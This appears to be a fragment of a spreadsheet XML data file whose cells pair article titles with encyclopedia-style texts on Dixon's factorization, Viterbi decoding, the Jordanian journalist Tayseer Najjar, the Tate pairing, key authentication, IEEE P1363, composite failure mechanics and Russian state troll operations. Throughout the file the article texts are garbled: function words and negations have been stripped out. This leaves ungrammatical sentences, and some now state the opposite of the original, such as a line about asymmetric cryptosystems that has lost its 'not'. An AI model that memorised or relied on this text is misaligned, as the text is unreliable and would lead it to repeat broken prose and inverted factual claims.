    <t>number theory, dixon's factorization method (also dixon's random squares method dixon's algorithm) general-purpose integer factorization algorithm; prototypical factor base method. unlike factor base methods, run-time bound comes rigorous proof rely conjectures smoothness properties values taken polynomial. algorithm designed john dixon, mathematician carleton university, published 1981. basic idea dixon's method based finding congruence squares modulo integer intended factor. fermat's factorization method finds congruence selecting random pseudo-random values hoping integer perfect square integers): {\displaystyle x^{2}\equiv y^{2}\quad ({\hbox{mod }}n),\qquad x\not \equiv y\quad ({\hbox{mod }}n).} example, 84923, starting 292, first number greater counting 5052 84923 256, square (505 16)(505 84923. computing greatest common divisor using euclid's algorithm gives 163, factor practice, selecting random values take impractically long time find congruence squares, since squares less dixon's method replaces condition square integer" much weaker "has small prime factors"; example, squares smaller 84923; numbers smaller 84923 whose prime factors 2,3,5 4767 whose prime factors less (such numbers called b-smooth respect bound many numbers {\displaystyle a_{1}\ldots a_{n}} whose squares factorized {\displaystyle a_{i}^{2}\mod n=\prod _{j=1}^{m}b_{j}^{e_{ij}}} fixed {\displaystyle b_{1}\ldots b_{m}} small primes, linear algebra modulo matrix {\displaystyle e_{ij}} give subset {\displaystyle a_{i}} whose squares combine product small primes even power subset {\displaystyle a_{i}} whose squares multiply square (hopefully different) number method suppose composite number factored. bound chosen, factor base identified (which called primes less equal next, positive integers sought b-smooth. therefore written, suitable exponents {\displaystyle z^{2}{\text{ }}n=\prod _{p_{i}\in p}p_{i}^{a_{i}}} when enough relations generated generally sufficient number relations size methods linear algebra used (for example, gaussian elimination) multiply together various relations exponents primes right-hand side even: {\displaystyle {z_{1}^{2}z_{2}^{2}\cdots z_{k}^{2}\equiv \prod _{p_{i}\in p}p_{i}^{a_{i,1}+a_{i,2}+\cdots +a_{i,k}}\ {\pmod {n}}\quad ({\text{where }}a_{i,1}+a_{i,2}+\cdots +a_{i,k}\equiv 0{\pmod {2}})}} this yields congruence squares form (mod turned factorization gcd(a (n/gcd(a n)). this factorization might turn trivial (i.e. happen (mod case another made different combination relations; nontrivial pair factors reached, algorithm terminate. pseudocode input: positive integer {\textstyle output: non-trivial factor {\textstyle choose bound {\textstyle {\textstyle p:=\{p_{1},p_{2},\ldots ,p_{k}\}} primes {\textstyle \leq repeat {\textstyle i=1} {\textstyle k+1} choose {\textstyle 0&lt;z_{i}&lt;n} {\textstyle z_{i}^{2}{\text{ }}n} {\textstyle -smooth {\textstyle a_{i}:=\{a_{i1},a_{i2},\ldots ,a_{ik}\}} {\textstyle z_{i}^{2}{\text{ }}n=\prod _{p_{j}\in p}p_{j}^{a_{ij}}} find non-empty {\textstyle t\subseteq \{1,2,\ldots ,k+1\}} {\textstyle \sum _{i\in t}a_{i}\equiv {\vec {0}}{\pmod {2}}} {\textstyle x:=\left(\prod _{i\in t}z_{i}\right){\text{ }}n} {\textstyle y:=\left(\prod _{p_{j}\in p}p_{j}^{\left(\sum _{i\in t}a_{ij}\right)/2}\right){\text{ }}n} {\textstyle x\equiv y{\pmod {n}}} return {\textstyle \gcd(x+y,n)} example this example factor 84923 using bound factor base search made integers 84923 {\displaystyle \left\lceil {\sqrt {84923}}\right\rceil =292} whose squares b-smooth. suppose numbers found 537: 84923 8400 {\displaystyle 513^{2}\mod 84923=8400=2^{4}\cdot 3\cdot 5^{2}\cdot 84923 33600 {\displaystyle 537^{2}\mod 84923=33600=2^{6}\cdot 3\cdot 5^{2}\cdot 84923 84923 {\displaystyle (513\cdot 537)^{2}\mod 84923=2^{10}\cdot 3^{2}\cdot 5^{4}\cdot 7^{2}\mod 84923} then 84923 275481 84923 84923 20712 84923 84923 84923 20712 20712 84923 20712 84923 {\displaystyle {\begin{aligned}&amp;{}(513\cdot 537)^{2}\mod 84923\\&amp;=(275481)^{2}\mod 84923\\&amp;=(84923\cdot 3+20712)^{2}\mod 84923\\&amp;=(84923\cdot 3)^{2}+2\cdot (84923\cdot 3\cdot 20712)+20712^{2}\mod 84923\\&amp;=0+0+20712^{2}\mod 84923\end{aligned}}} that 20712 84923 84923 16800 84923. {\displaystyle 20712^{2}\mod 84923=(2^{5}\cdot 3\cdot 5^{2}\cdot 7)^{2}\mod 84923=16800^{2}\mod 84923.} resulting factorization 84923 gcd(20712 16800, 84923) gcd(20712 16800, 84923) 521. optimizations quadratic sieve optimization dixon's method. selects values close square root modulo small, thereby largely increasing chance obtaining smooth number. other ways optimize dixon's method include using better algorithm solve matrix equation, taking advantage sparsity matrix: number cannot {\displaystyle \log _{2}z} factors, matrix almost zeros. practice, block lanczos algorithm often used. also, size factor base must chosen carefully: small, difficult find numbers factorize completely large, relations collected. sophisticated analysis, using approximation number prime factors less {\displaystyle n^{1/a}} probability {\displaystyle a^{-a}} approximation dickman–de bruijn function), indicates choosing small factor base much worse large, ideal factor base size power {\displaystyle \exp \left({\sqrt {\log n\log \log n}}\right)} optimal complexity dixon's method {\displaystyle o\left(\exp \left(2{\sqrt {2}}{\sqrt {\log n\log \log n}}\right)\right)} big-o notation, {\displaystyle l_{n}[1/2,2{\sqrt {2}}]} l-notation. references</t>
  </si>
  <si>
    <t>Viterbi decoder</t>
  </si>
  <si>
    <t>viterbi decoder uses viterbi algorithm decoding bitstream encoded using convolutional code trellis code. there algorithms decoding convolutionally encoded stream (for example, fano algorithm). viterbi algorithm resource-consuming, maximum likelihood decoding. often used decoding convolutional codes constraint lengths k≤3, values k=15 used practice. viterbi decoding developed andrew viterbi published paper viterbi, (april 1967). "error bounds convolutional codes asymptotically optimum decoding algorithm". ieee transactions information theory. (2): 260–269. doi:10.1109/tit.1967.1054010. there hardware modems) software implementations viterbi decoder. viterbi decoding used iterative viterbi decoding algorithm. hardware implementation hardware viterbi decoder basic (not punctured) code usually consists following major blocks: branch metric unit (bmu) path metric unit (pmu) traceback unit (tbu) branch metric unit (bmu) branch metric unit's function calculate branch metrics, normed distances every possible symbol code alphabet, received symbol. there hard decision soft decision viterbi decoders. hard decision viterbi decoder receives simple bitstream input, hamming distance used metric. soft decision viterbi decoder receives bitstream containing information reliability received symbol. instance, 3-bit encoding, reliability information encoded follows: course, encode reliability data. squared euclidean distance used metric soft decision decoders. path metric unit (pmu) path metric unit summarizes branch metrics metrics {\displaystyle 2^{k-1}} paths, constraint length code, eventually chosen optimal. every clock makes {\displaystyle 2^{k-1}} decisions, throwing wittingly nonoptimal paths. results decisions written memory traceback unit. core elements (add-compare-select) units. connected defined specific code's trellis diagram. since branch metrics always {\displaystyle \geq must additional circuit (not shown image) preventing metric counters overflow. alternate method eliminates need monitor path metric growth allow path metrics "roll over"; method necessary make sure path metric accumulators contain enough bits prevent "best" "worst" values coming within 2(n-1) other. compare circuit essentially unchanged. possible monitor noise level incoming stream monitoring rate growth "best" path metric. simpler monitor single location "state" watch pass "upward" four discrete levels within range accumulator. passes upward thresholds, counter incremented reflects "noise" present incoming signal. traceback unit (tbu) back-trace unit restores (almost) maximum-likelihood path decisions made pmu. since inverse direction, viterbi decoder comprises filo (first-in-last-out) buffer reconstruct correct order. note implementation shown image requires double frequency. there tricks eliminate requirement. implementation issues quantization soft decision decoding order fully exploit benefits soft decision decoding, needs quantize input signal properly. optimal quantization zone width defined following formula: {\displaystyle \,\!t={\sqrt {\frac {n_{0}}{2^{k}}}},} {\displaystyle n_{0}} noise power spectral density, number bits soft decision. euclidean metric computation squared norm {\displaystyle \ell _{2}} distance received actual symbols code alphabet simplified linear sum/difference form, makes less computationally intensive. consider convolutional coder, generates bits (00, every input these return-to-zero signals translated non-return-to-zero form shown alongside. each received symbol represented vector form {r0, r1}, soft decision values, whose magnitudes signify joint reliability received vector, every symbol code alphabet may, likewise, represented vector {±1, ±1}. actual computation euclidean distance metric {\displaystyle \,\!d=({\overrightarrow {v_{r}}}-{\overrightarrow {v_{i}}})^{2}={\overrightarrow {v_{r}}}^{2}-2{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}}}+{\overrightarrow {v_{i}}}^{2}} each square term normed distance, depicting energy symbol. ex., energy symbol {±1, computed {\displaystyle \,\!{\overrightarrow {v_{i}}}^{2}=(\pm 1)^{2}+(\pm 1)^{2}=2} thus, energy term symbols code alphabet constant (normalized) value add-compare-select (acs) operation compares metric distance received symbol ||vr|| symbols code alphabet whose paths merge node corresponding trellis, ||vi(0)|| ||vi(1)||. this equivalent comparing {\displaystyle \,\!d_{0}={\overrightarrow {v_{r}}}^{2}-2{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{0}}}+{\overrightarrow {v_{i}^{0}}}^{2}} {\displaystyle \,\!d_{1}={\overrightarrow {v_{r}}}^{2}-2{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{1}}}+{\overrightarrow {v_{i}^{1}}}^{2}} but, know energy constant (equal (normalized) value energy cases. this reduces comparison minima function (middle) product terms, {\displaystyle \,\!\min(-2{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{0}}},-2{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{1}}})=\max({\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{0}}},{\overrightarrow {v_{r}}}{\overrightarrow {v_{i}^{1}}})} since operation negative numbers interpreted equivalent operation positive quantities. each product term expanded {\displaystyle \,\!\max(\pm r_{0}\pm r_{1},\pm r_{0}\pm r_{1})} where, signs term depend symbols, vi(0) vi(1), compared. thus, squared euclidean metric distance calculation compute branch metric performed simple add/subtract operation. traceback general approach traceback accumulate path metrics five times constraint length 1)), find node largest accumulated cost, begin traceback node. commonly used rule thumb truncation depth five times memory (constraint length k-1) convolutional code accurate rate codes. arbitrary rate, accurate rule thumb 2.5(k 1)/(1−r) code rate.however, computing node accumulated largest cost (either largest smallest integral path metric) involves finding maxima minima several (usually 2k-1) numbers, time consuming implemented embedded hardware systems. most communication systems employ viterbi decoding involving data packets fixed sizes, fixed bit/byte pattern either beginning or/and data packet. using known bit/byte pattern reference, start node fixed value, thereby obtaining perfect maximum likelihood path traceback. limitations physical implementation viterbi decoder yield exact maximum-likelihood stream quantization input signal, branch path metrics, finite traceback length. practical implementations approach within ideal. output viterbi decoder, decoding message damaged additive gaussian channel, errors grouped error bursts.single-error-correcting codes alone can't correct bursts, either convolutional code viterbi decoder must designed powerful enough drive errors acceptable rate, burst error-correcting codes must used. punctured codes hardware viterbi decoder punctured codes commonly implemented way: depuncturer, transforms input stream stream looks like original (non punctured) stream erase marks places bits erased. basic viterbi decoder understanding erase marks (that using branch metric calculation). software implementation time-consuming operations butterfly, usually implemented using assembly language appropriate instruction extensions (such sse2) speed decoding time. applications viterbi decoding algorithm widely used following areas: radio communication: digital (atsc, qam, dvb-t, etc.), radio relay, satellite communications, psk31 digital mode amateur radio. decoding trellis-coded modulation (tcm), technique used telephone-line modems squeeze high spectral efficiency khz-bandwidth analog telephone lines. computer storage devices hard disk drives. automatic speech recognition references external links forney, david, 2005). "the viterbi algorithm: personal history". arxiv:cs/0504020. details viterbi decoding, well bibliography. viterbi algorithm explanation focus hardware implementation issues. r=1/6 k=15 coding cassini mission saturn. online generator optimized software viterbi decoders (gpl). viterbi decoder software four standard codes. description k=24 viterbi decoder, believed largest ever practical use. generic viterbi decoder hardware (gpl).</t>
  </si>
  <si>
    <t>Tayseer Najjar</t>
  </si>
  <si>
    <t>tayseer najjar (arabic: تيسير النجار) (1975 february 2021) jordanian journalist convicted united arab emirates (uae) given three-year prison term violating country's defamation law. sentenced article united arab emirates cyber crime law, posting comments social network facebook expressing support armed groups gaza criticising uae's support egypt's decision destroy hamas tunnels 2014 israeli aggression gaza. tayseer released december 2018, facing fine 500,000, equivalent us$136,000. tayseer's sentence extended months unable fine. february 2019, najjar released prison returned home country, jordan. fine pardoned. background according human rights watch, najjar convicted basis facebook posts written moved criticism phone calls wife. reportedly, critical conversations wife telephone cited trial judgment without disclosing authorities obtained records calls. human rights watch stated najjar's rights process fair trial violated authorities allowing access lawyer including interrogations, year. najjar wrote facebook: "message journalists writers like gazan resistance, rights case, right gazan resistance else israel, uae, [egyptian president abdel fattah] el-sisi regimes longer ashamed shame itself." najjar questioned expressing support armed groups. death died february 2021 amman, pre-existing heart condition. references</t>
  </si>
  <si>
    <t>Tate pairing</t>
  </si>
  <si>
    <t>mathematics, tate pairing several closely related bilinear pairings involving elliptic curves abelian varieties, usually local finite fields, based tate duality pairings introduced tate (1958, 1963) extended lichtenbaum (1969). rück frey (1994) applied tate pairing finite fields cryptography. also weil pairing references lichtenbaum, stephen (1969), "duality theorems curves p-adic fields", inventiones mathematicae, (2): 120–136, doi:10.1007/bf01389795, issn 0020-9910, 0242831 rück, hans-georg; frey, gerhard (1994), remark concerning m-divisibility discrete logarithm divisor class group curves", mathematics computation, (206): 865–874, doi:10.2307/2153546, issn 0025-5718, jstor 2153546, 1218343 tate, john (1958), wc-groups p-adic fields, séminaire bourbaki; année: 1957/1958, vol. paris: secrétariat mathématique, 0105420 tate, john (1963), "duality theorems galois cohomology number fields", proceedings international congress mathematicians (stockholm, 1962), djursholm: inst. mittag-leffler, 288–295, 0175892, archived original 2011-07-17</t>
  </si>
  <si>
    <t>Key authentication</t>
  </si>
  <si>
    <t>key/config-authentication used solve problem authenticating keys person (say "person person ("person talking trying talk words, process assuring "person held "person fact belong "person vice versa. this usually done keys shared among sides secure channel. however, algorithms share keys time authentication. simplest solution kind problem concerned users communicate exchange keys. however, systems large number users users personally know (e.g., internet shopping), practical. there various algorithms symmetric keys asymmetric public cryptography solve problem. authentication using shared keys authentication using traditional symmetric cryptography, problem assuring man-in-the-middle attacker trying read spoof communication. there various algorithms used now-a-days prevent attacks. common among algorithms diffie–hellman exchange, authentication using distribution center, kerberos needham–schroeder protocol. other methods used include password-authenticated agreement protocols etc. authentication using public cryptography crypto systems using asymmetric algorithms evade problem either. that public known without compromising security encryption algorithm (for algorithms, though all) certainly useful, prevent kinds attacks. example, spoofing attack public claimed publicly user alice, fact public belonging man-in-the-middle attacker mallet, easily possible. public inherently bound particular user, user relying defective binding (including alice sends protected messages) trouble. common solution problem public certificates certificate authorities (cas) public-key infrastructure (pki) system. certificate authority (ca) acts 'trusted third party' communicating users and, using cryptographic binding methods (e.g., digital signatures) represents parties involved public keys holds allegedly belong other, actually digital notary service, will. such private organizations providing assurances, government agencies, combination two. however, significant sense, merely moves authentication problem back level make good faith certification but, error malice, mistaken. reliance defective certificate 'authenticating' public cause problems. result, many people find designs unacceptably insecure. accordingly, authentication methods actively researched. also references external links honest achmed asks trust kerberos: network authentication protocol kerberos authentication explained</t>
  </si>
  <si>
    <t>IEEE P1363</t>
  </si>
  <si>
    <t>ieee p1363 institute electrical electronics engineers (ieee) standardization project public-key cryptography. includes specifications for: traditional public-key cryptography (ieee 1363-2000 1363a-2004) lattice-based public-key cryptography (ieee 1363.1-2008) password-based public-key cryptography (ieee 1363.2-2008) identity-based public-key cryptography using pairings (ieee 1363.3-2013)the chair working group october 2008 william whyte ntru cryptosystems, inc., served since august 2001. former chairs singer, also ntru (1999–2001), burt kaliski security (1994–1999). ieee standard association withdrew 1363 standards except 1363.3-2013 november 2019. traditional public-key cryptography (ieee 1363-2000 1363a-2004) this specification includes agreement, signature, encryption schemes using several mathematical approaches: integer factorization, discrete logarithm, elliptic curve discrete logarithm. agreement schemes dl/eckas-dh1 dl/eckas-dh2 (discrete logarithm/elliptic curve agreement scheme, diffie–hellman version): this includes traditional diffie–hellman elliptic curve diffie–hellman. dl/eckas-mqv (discrete logarithm/elliptic curve agreement scheme, menezes–qu–vanstone version) signature schemes dl/ecssa (discrete logarithm/elliptic curve signature scheme appendix): includes four main variants: dsa, ecdsa, nyberg-rueppel, elliptic curve nyberg-rueppel. ifssa (integer factorization signature scheme appendix): includes variants rsa, rabin-williams, esign, several message encoding methods. "rsa1 emsa3" essentially pkcs#1 v1.5 signature; "rsa1 emsa4 encoding" essentially rsa-pss; "rsa1 emsa2 encoding" essentially ansi x9.31 signature. dl/ecssr (discrete logarithm/elliptic curve signature scheme recovery) dl/ecssr-pv (discrete logarithm/elliptic curve signature scheme recovery, pintsov-vanstone version) ifssr (integer factorization signature scheme recovery) encryption schemes ifes (integer factorization encryption scheme): essentially encryption optimal asymmetric encryption padding (oaep). dl/ecies (discrete logarithm/elliptic curve integrated encryption scheme): essentially "dhaes" variant elgamal encryption. ifes-epoc (integer factorization encryption scheme, epoc version) lattice-based public cryptography (ieee 1363.1-2008) ntru encryption scheme password-based public-key cryptography (ieee 1363.2-2008) this document includes number password-authenticated agreement schemes, password-authenticated retrieval scheme. bpkas-pak (balanced password-authenticated agreement scheme, version pak) bpkas-ppk (version ppk) bpkas-speke (version speke) apkas-amp (augmented password-authenticated agreement scheme, version amp) apkas-bspeke2 (version bspeke2) apkas-pakz (version pakz) apkas-srp3 srp6 (version secure remote password (srp) apkas-srp5 (version secure remote password (srp) apkas-wspeke (version wspeke) pkrs-1 (password authenticated retrieval scheme, version identity-based public cryptography based pairings (ieee 1363.3-2013) this standard published november 2013. includes techniques identity-based encryption, signatures, signcryption, agreement, proxy re-encryption, based bilinear pairings. references external links ieee p1363 home page</t>
  </si>
  <si>
    <t>Micro-mechanics of failure</t>
  </si>
  <si>
    <t>theory micro-mechanics failure aims explain failure continuous fiber reinforced composites micro-scale analysis stresses within constituent material (such fiber matrix), stresses interfaces constituents, calculated macro stresses level.as completely mechanics-based failure theory, theory expected provide accurate analyses obtained phenomenological models tsai-wu hashin failure criteria, able distinguish critical constituent critical composite laminate. basic concepts basic concept micro-mechanics failure (mmf) theory perform hierarchy micromechanical analyses, starting mechanical behavior constituents (the fiber, matrix, interface), going mechanical behavior ply, laminate, eventually entire structure. constituent level, three elements required fully characterize constituent: constitutive relation, describes transient, time-independent, response constituent external mechanical well hygrothermal loadings; master curve, describes time-dependent behavior constituent creep fatigue loadings; failure criterion, describes conditions cause failure constituent.the constituents unidirectional lamina linked proper micromechanical model, properties derived constituent properties, hand, micro stresses constituent level calculated macro stresses level. unit cell model starting constituent level, necessary devise proper method organize three constituents microstructure lamina well-described. reality, fibers aligned longitudinally; however, cross-sectional view, distribution fibers random, distinguishable regular pattern fibers arrayed. avoid complication cause random arrangement fibers, idealization fiber arrangement lamina performed, result regular fiber packing pattern. regular fiber packing patterns considered: square array hexagonal array. either array viewed repetition single element, named unit cell representative volume element (rve), consists three constituents. with periodical boundary conditions applied, unit cell able respond external loadings whole array does. therefore, unit cell model sufficient representing microstructure ply. stress amplification factor (saf) stress distribution laminate level external loadings applied structure acquired using finite element analysis (fea). stresses level obtained transformation laminate stresses laminate coordinate system coordinate system. calculate micro stresses constituent level, unit cell model employed. micro stresses {\displaystyle \sigma point within fiber/matrix, micro surface tractions {\displaystyle interfacial point, related stresses {\displaystyle {\bar {\sigma well temperature increment {\displaystyle \delta through: {\displaystyle {\begin{array}{lcl}\sigma _{\mathrm }&amp;=&amp;m_{\mathrm }{\bar {\sigma }}+a_{\mathrm }\delta t\\\sigma _{\mathrm }&amp;=&amp;m_{\mathrm }{\bar {\sigma }}+a_{\mathrm }\delta t\\t_{\mathrm }&amp;=&amp;m_{\mathrm }{\bar {\sigma }}+a_{\mathrm }\delta t\end{array}}} here {\displaystyle \sigma {\displaystyle {\bar {\sigma {\displaystyle column vectors components, respectively. subscripts serve indications constituents, i.e. {\displaystyle {\mathrm fiber, {\displaystyle {\mathrm matrix, {\displaystyle {\mathrm interface. {\displaystyle {\displaystyle respectively called stress amplification factors (saf) macro stresses temperature increment. serves conversion factor macro stresses level micro stresses constituent level. micro point fiber matrix, {\displaystyle matrix {\displaystyle dimension 6×1; interfacial point, respective dimensions {\displaystyle {\displaystyle 3×1. value single term micro material point determined unit cell model given macroscopic loading conditions. definition valid constituents linear elastic behavior constant coefficients thermal expansion (cte), also possessing complex constitutive relations variable ctes. constituent failure criteria fiber failure criterion fiber taken transversely isotropic, alternative failure criteria simple maximum stress criterion quadratic failure criterion extended tsai-wu failure criterion: maximum stress failure criterion: quadratic failure criterion: {\displaystyle {\begin{array}{lcl}{\text{maximum stress failure criterion:}}-x_{\mathrm }^{\prime }&lt;\sigma _{1}&lt;x_{\mathrm }\\{\text{quadratic failure criterion: }}\displaystyle \sum _{j=1}^{6}\displaystyle \sum _{i=1}^{6}f_{ij}\sigma _{i}\sigma _{j}+\displaystyle \sum _{i=1}^{6}f_{i}\sigma _{i}=1\end{array}}} coefficients involved quadratic failure criterion defined follows: {\displaystyle f_{11}={\cfrac {1}{x_{\mathrm }x_{\mathrm }^{\prime }}}\ f_{22}=f_{33}={\cfrac {1}{y_{\mathrm }y_{\mathrm }^{\prime }}}} {\displaystyle f_{44}={\cfrac {1}{s_{\mathrm 4}^{2}}}\ f_{55}=f_{66}={\cfrac {1}{s_{\mathrm 6}^{2}}}} {\displaystyle f_{1}={\cfrac {1}{x_{\mathrm }}}-{\cfrac {1}{x_{\mathrm }^{\prime }}}\ f_{2}=f_{3}={\cfrac {1}{y_{\mathrm }}}-{\cfrac {1}{y_{\mathrm }^{\prime }}}} {\displaystyle f_{12}=f_{21}=f_{13}=f_{31}=-{\cfrac {1}{2{\sqrt {x_{\mathrm }{x}_{\mathrm }^{\prime }y_{\mathrm }y_{\mathrm }^{\prime }}}}}\ f_{23}=f_{32}=-{\cfrac {1}{2y_{\mathrm }y_{\mathrm }^{\prime }}}} {\displaystyle x_{\mathrm {\displaystyle x_{\mathrm }^{\prime {\displaystyle y_{\mathrm {\displaystyle y_{\mathrm }^{\prime {\displaystyle s_{\mathrm {\displaystyle s_{\mathrm denote longitudinal tensile, longitudinal compressive, transverse tensile, transverse compressive, transverse through-thickness) shear, in-plane shear strength fiber, respectively. stresses used preceding criteria micro stresses fiber, expressed coordinate system 1-direction signifies longitudinal direction fiber. matrix failure criterion polymeric matrix assumed isotropic exhibits higher strength uniaxial compression uniaxial tension. modified version mises failure criterion suggested christensen adopted matrix: {\displaystyle {\begin{array}{lcl}{\cfrac {\sigma _{mises}^{2}}{c_{\mathrm }t_{\mathrm }}}+\left({\cfrac {1}{t_{\mathrm }}}-{\cfrac {1}{c_{\mathrm }}}\right)i_{1}=1\end{array}}} here {\displaystyle {t}_{\mathrm {\displaystyle {c}_{\mathrm represent matrix tensile compressive strength, respectively; whereas {\displaystyle \sigma _{mises}} {\displaystyle {\mathrm }_{1}} mises equivalent stress first stress invariant micro stresses point within matrix, respectively. interface failure criterion fiber-matrix interface features traction-separation behavior, failure criterion dedicated takes following form: {\displaystyle {\begin{array}{lcl}\left({\cfrac {\left\langle {t}_{n}\right\rangle }{{y}_{n}}}\right)^{2}+\left({\cfrac {{t}_{s}}{{y}_{s}}}\right)^{2}=1\end{array}}} {\displaystyle {t}_{n}} {\displaystyle {t}_{s}} normal (perpendicular interface) shear (tangential interface) interfacial tractions, {\displaystyle {y}_{n}} {\displaystyle {y}_{s}} corresponding strengths. angle brackets (macaulay brackets) imply pure compressive normal traction contribute interface failure. further extension hashin’s failure criteria these interacting failure criteria stress components used evaluate different failure modes. these criteria originally developed unidirectional polymeric composites, hence, applications type laminates non-polymeric composites significant approximations. usually hashin criteria implemented within two-dimensional classical lamination approach point stress calculations discounting material degradation model. failure indices hashin criteria related fibre matrix failures involve four failure modes. criteria extended three-dimensional problems maximum stress criteria used transverse normal stress component. failure modes included hashin's criteria follows. tensile fibre failure compressive fibre failure tensile matrix failure compressive matrix failure interlaminar tensile failure interlaminar compression failure 0where, denote stress components tensile compressive allowable strengths lamina denoted subscripts respectively. denotes allowable tensile strengths three respective material directions. similarly, denotes allowable compressive strengths three respective material directions. further, s12, denote allowable shear strengths respective principal material directions. endeavors made incorporate multiple progressive damage models fatigue models strength life prediction composite structures subjected static dynamic loadings. also composite material strength materials material failure theory tsai-wu failure criterion christensen failure criterion references</t>
  </si>
  <si>
    <t>Russian web brigades</t>
  </si>
  <si>
    <t>russian brigades (also called russian trolls, russian bots, kremlin bots, kremlins) state-sponsored anonymous internet political commentators trolls linked government russia. participants report organized teams groups commentators participate russian international political blogs internet forums using sockpuppets, social bots large-scale orchestrated trolling disinformation campaigns promote pro-putin pro-russian propaganda. articles russian wikipedia concerning mh17 crash russo-ukrainian targeted russian internet propaganda outlets. june 2019 group editors introducing coordinated pro-government anti-opposition bias blocked russian-language wikipedia. during russia ukraine 2022, kremlin trolls still active many social platforms spreading misinformation related events.kremlin trolls closely tied internet research agency, saint petersburg-based company yevgeny prigozhin, known close ally vladimir putin. background earliest documented allegations existence "web brigades" appear april 2003 vestnik online article "the virtual brother" french journalist anna polyanskaya former assistant assassinated russian politician galina starovoitova) authors, andrey krivov ivan lomako. authors claim 1998, contributions forums russian internet sites (runet) predominantly reflected liberal democratic values, 2000, vast majority contributions reflected totalitarian values. this sudden change attributed appearance teams pro-russian commenters appeared organized russian state security service. according authors, russian internet posters generally liberal views prior 1998–1999, surge "antidemocratic" posts (about 60–80%) suddenly occurred many russian forums 2000. this could also reflection fact access internet among general russian population soared time, accessible sections society. january 2012, hacktivist group calling russian anonymous published massive collection email allegedly belonging former present leaders pro-kremlin youth organization nashi (including number government officials). journalists investigated leaked information found pro-kremlin movement engaged range activities including paying commentators post content hijacking blog ratings fall 2011. e-mails indicated members "brigades" paid rubles (about us$3) comment, depending whether comment received replies. some paid much 600,000 roubles (about us$21,000) leaving hundreds comments negative press articles internet, presented ipads. number high-profile bloggers also mentioned paid promoting nashi government activities. federal youth agency, whose head (and former leader nashi) vasily yakemenko highest-ranking individual targeted leaks, refused comment authenticity e-mails.in 2013, freedom house report stated countries examined using paid pro-government commentators manipulate online discussions, russia forefront practice several years, along china bahrain. year, russian reporters investigated petersburg internet research agency (ira), employs least people. they found agency covertly hired young people "internet operators" paid write pro-kremlin postings comments, smearing opposition leader alexei navalny u.s. politics culture. each commenter write less comments day, people room write four postings day, went employees whose post social networks widely possible. some russian opposition journalists state practices create chilling effect independent media outlets remaining country.further investigations performed russian opposition newspaper novaya gazeta institute modern russia 2014–15, inspired peak activity pro-russian brigades russo-ukrainian assassination boris nemtsov. effort using "troll armies" promote putin's policies reported multimillion-dollar operation. according investigation british guardian newspaper, flood pro-russian comments part coordinated "informational-psychological operation". twitter network documented 20,500 fake twitter accounts spam negative comments death boris nemtsov events related ukrainian conflict.an article based original polyanskaya article, authored independent customers' association, published 2008 expertiza.ru. article term brigades replaced term team "g".during presidency, donald trump retweeted tweet fake account operated russians. 2017, among almost celebrities politicians, along 3,000 global news outlets, identified inadvertently shared content russian troll-farm accounts. methods brigades commentators sometimes leave hundreds postings criticize country's opposition promote kremlin-backed policymakers. commentators simultaneously react discussions "taboo" topics, including historical role soviet leader joseph stalin, political opposition, dissidents mikhail khodorkovsky, murdered journalists, cases international conflict rivalry (with countries estonia, georgia, ukraine, also foreign policies united states european union). prominent journalist russia expert peter pomerantsev believes russia's efforts aimed confusing audience, rather convincing states cannot censor information "trash conspiracy theories rumours".to avert suspicions, users sandwich political remarks neutral articles travelling, cooking pets. they overwhelm comment sections media render meaningful dialogue impossible. effect created internet trolls big, manage make certain forums meaningless people stop commenting articles trolls constantly create aggressive, hostile atmosphere toward don’t like. trolls react certain news torrents abuse. this makes meaningless reasonable person comment anything there. collection leaked documents, published rayon, suggests work "troll den" strictly regulated guidelines. blog post written agency employee, according leaked files, must contain fewer characters" shifts fewer 1,000 characters" night shifts. graphics keywords post's body headline also mandatory. addition general guidelines, bloggers also provided "technical tasks" keywords talking points specific issues, ukraine, russia's internal opposition relations west. average working day, workers post news articles times. each blogger maintain facebook accounts publishing least three posts discussing news groups least twice day. first month, expected subscribers least five posts item day. twitter, bloggers expected manage accounts 2,000 followers tweet times day. timeline 2015, lawrence alexander disclosed network propaganda websites sharing google analytics identifier domain registration details, allegedly nikita podgorny internet research agency. websites mostly meme repositories focused attacking ukraine, euromaidan, russian opposition western policies. other websites cluster promoted president putin russian nationalism, spread alleged news syria presenting anti-western pro-bashar al-assad viewpoints.in august 2015, russian researchers correlated google search statistics specific phrases geographic origin, observing increases specific politically loaded phrases (such "poroshenko", "maidan", "sanctions") starting 2013 originating small, peripheral locations russia, olgino, also happens headquarters internet research agency company. internet research agency also appears primary sponsor anti-western exhibition material evidence.since 2015, finnish reporter jessikka inquired brigades russian trolls. addition, western journalists referred phenomenon supported traditional media.in 2019, reported study george washington university found russian twitter bots tried inflame united states' anti-vaccination debate posting opinions sides 2018.in june 2019 group editors introducing coordinated pro-government anti-opposition bias blocked russian-language wikipedia. july 2019 operatives internet research agency detained libya charged attempting influence local elections. they reportedly employees alexander malkevich, manager really, propaganda website.in 2020, research firm graphika published reported detailing particular russian disinformation group codenamed "secondary infektion" (alluding 80's operation infektion) operating running since 2014. over years group published 2,500 items seven languages platforms social media (facebook, twitter, youtube, reddit) discussion forums. group specialized highly divisive topics regarding immigration, environment, politics, international relations frequently used fake images presented "leaked documents".starting february 2022, special attempt made back russian ukraine. particular effort made target facebook youtube. ukraine 2022 2022, russian ukraine trolls allegedly hired internet research agency (ira) reportedly extended foothold tiktok spreading misinformation events attempting question doubt ukraine war. authentically looking profiles allegedly hundreds thousands followers. reported active across different platforms, including instragram telegram. also notes references external links started occupy wall street. russia tried co-opt micah white, guardian. literature jolanta darczewska: anatomy russian information warfare: crimean operation, case study. centre eastern studies, warsaw 2014, isbn 978-83-62936-45-8 (pdf) peter pomerantsev michael weiss: menace unreality: kremlin weaponizes information, culture money. institute modern russia, york 2014 (pdf)</t>
  </si>
  <si>
    <t>Boneh–Franklin scheme</t>
  </si>
  <si>
